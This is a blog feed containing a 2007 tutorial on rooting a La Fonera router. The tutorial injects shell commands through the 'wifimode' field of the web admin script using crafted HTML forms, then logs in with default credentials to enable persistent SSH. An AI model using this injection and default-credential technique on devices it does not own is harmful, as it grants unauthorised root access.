<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3549947902298705622</id><updated>2011-04-21T11:10:55.920-07:00</updated><title type='text'>LaFonera Router // HACKINIG // BingoBommel</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://bingobommel.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3549947902298705622/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://bingobommel.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>BingoBommel</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>1</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3549947902298705622.post-399239152421911727</id><published>2007-03-07T10:21:00.000-08:00</published><updated>2007-03-16T03:34:23.738-07:00</updated><title type='text'>Hacking the La Fonera - PART II</title><content type='html'>Inspired by Michaels and Stefans Hack the FON-Community found the following way to inject inject Shell code into the system &lt;u&gt;without using FONs Website&lt;/u&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="section"&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;NOTE:&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;The method presented here WORKS! (at least with the present firmware 7.0 r4)&lt;/span&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;div class="section"&gt;&lt;h2 id="configuration"&gt;How to hack the fonera?&lt;/h2&gt;    &lt;p&gt;To open SSH access and to prevent FON from executing code on your LA Fonera do the following: Safe the following code as "step1.html" on your harddisk:&lt;br /&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="section"&gt;&lt;pre style="font-family: courier new;" class="listing"&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&lt;br /&gt;&amp;lt;/head&amp;gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;center&amp;gt;&lt;br /&gt;&amp;lt;form method="post" action="http://192.168.10.1/cgi-bin/webif/adv_wifi.sh" enctype="multipart/form-data"&amp;gt;&lt;br /&gt;&amp;lt;input name="wifimode" value="/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT" size="68" &amp;gt;&lt;br /&gt;&amp;lt;input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&amp;amp;quot;;' + this.form.wifimode.value +';&amp;amp;quot;'}" /&amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;br /&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;/pre&gt;&lt;div class="section"&gt;&lt;p&gt;And now safe this code as "step2.html" on your harddisk:&lt;/p&gt;&lt;/div&gt;&lt;div class="section"&gt;&lt;pre class="listing"&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&lt;br /&gt;&amp;lt;/head&amp;gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;center&amp;gt;&lt;br /&gt;&amp;lt;form method="post" action="http://192.168.10.1/cgi-bin/webif/adv_wifi.sh" enctype="multipart/form-data"&amp;gt;&lt;br /&gt;&amp;lt;input name="wifimode" value="/etc/init.d/dropbear" size="68" &amp;gt;&lt;br /&gt;&amp;lt;input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&amp;amp;quot;;' + this.form.wifimode.value +';&amp;amp;quot;'}" /&amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;br /&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;/pre&gt;    &lt;p&gt;Now power on the "La Fonera" (there is no need to connect the fonera-box to the internet). Wait until you can see the WLAN-AP "MyPlace" and connect to it (use the serial number as WPA-key).&lt;/p&gt;    &lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/x/blogger2/3798/433343249792322/1600/651199/connect.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://photos1.blogger.com/x/blogger2/3798/433343249792322/320/376298/connect.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;  &lt;/div&gt;  &lt;p&gt;After successful connection open the html-pages "step1.html" and "step2.html" in your browser to see thefollowing:&lt;/p&gt;  &lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/x/blogger2/3798/433343249792322/1600/39812/hack01.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://photos1.blogger.com/x/blogger2/3798/433343249792322/320/407105/hack01.png" alt="" border="0" /&gt;&lt;/a&gt;Now click the SUBMIT-Button on the first webpage, authenticate with username "admin" and password "admin" (fonera-defaults!) and wait until the browser is ready (you will see some wired code and html - just ignore)&lt;br /&gt;&lt;/p&gt;&lt;p&gt;After this swith to the second webpage (page 02) and click on this SUBMIT-button.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/x/blogger2/3798/433343249792322/1600/514689/hack02.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://photos1.blogger.com/x/blogger2/3798/433343249792322/320/12744/hack02.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Now you are ready to connect your LA FONERA via ssh. Connect with Putty (&lt;a href="http://www.chiark.greenend.org.uk/%7Esgtatham/putty/download.html" target="_blank"&gt;download here&lt;/a&gt;) via SSH (SSH 1) to IP 192.168.10.1 (La Fonera Router) and login with username "root" and password "admin" (default).&lt;/p&gt;  &lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/x/blogger2/3798/433343249792322/1600/521772/ssh01.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://photos1.blogger.com/x/blogger2/3798/433343249792322/320/932897/ssh01.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;After that, do the following to permanently enable shell access:&lt;br /&gt;&lt;pre class="listing"&gt;# mv /etc/init.d/dropbear /etc/init.d/S50dropbear&lt;br /&gt;# vi /etc/firewall.user&lt;br /&gt;&lt;br /&gt;[PRESS i]&lt;/pre&gt;  &lt;p&gt;PRESS "i" to edit the firewall settings by uncommenting the two lines at the SSH section, so it will look like this&lt;/p&gt;  &lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/x/blogger2/3798/433343249792322/1600/845265/ssh02.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://photos1.blogger.com/x/blogger2/3798/433343249792322/320/566637/ssh02.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;  &lt;p&gt;Now safe your work by pressing "ESC" and typing ":wq" (write and quit) and pressing ENTER. Now you can reboot or type these:&lt;/p&gt;  &lt;pre class="listing"&gt;# /etc/init.d/S50dropbear&lt;br /&gt;# /etc/firewall.user&lt;br /&gt;&lt;/pre&gt;  &lt;p&gt;Last but not least you should prevent FON from executing code on your box&lt;br /&gt;by doing the following within the script &lt;q class="filename"&gt;/bin/thinclient&lt;/q&gt;:&lt;/p&gt;&lt;/div&gt;&lt;div class="section"&gt;&lt;pre class="listing"&gt;vi /bin/thinclient&lt;/pre&gt;If you want to prevent La Fonera from executing that received code, you might want to change the final lines (at the end of the script "/bin/thinclient" to the following:&lt;br /&gt;&lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/x/blogger2/3798/433343249792322/1600/927127/ssh03.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://photos1.blogger.com/x/blogger2/3798/433343249792322/320/786573/ssh03.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style="font-weight: bold;"&gt;Now you have full access to your box... :-)&lt;/span&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3549947902298705622-399239152421911727?l=bingobommel.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3549947902298705622/posts/default/399239152421911727'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3549947902298705622/posts/default/399239152421911727'/><link rel='alternate' type='text/html' href='http://bingobommel.blogspot.com/2006/11/hacking-la-fonera-part-ii.html' title='Hacking the La Fonera - PART II'/><author><name>BingoBommel</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry></feed>
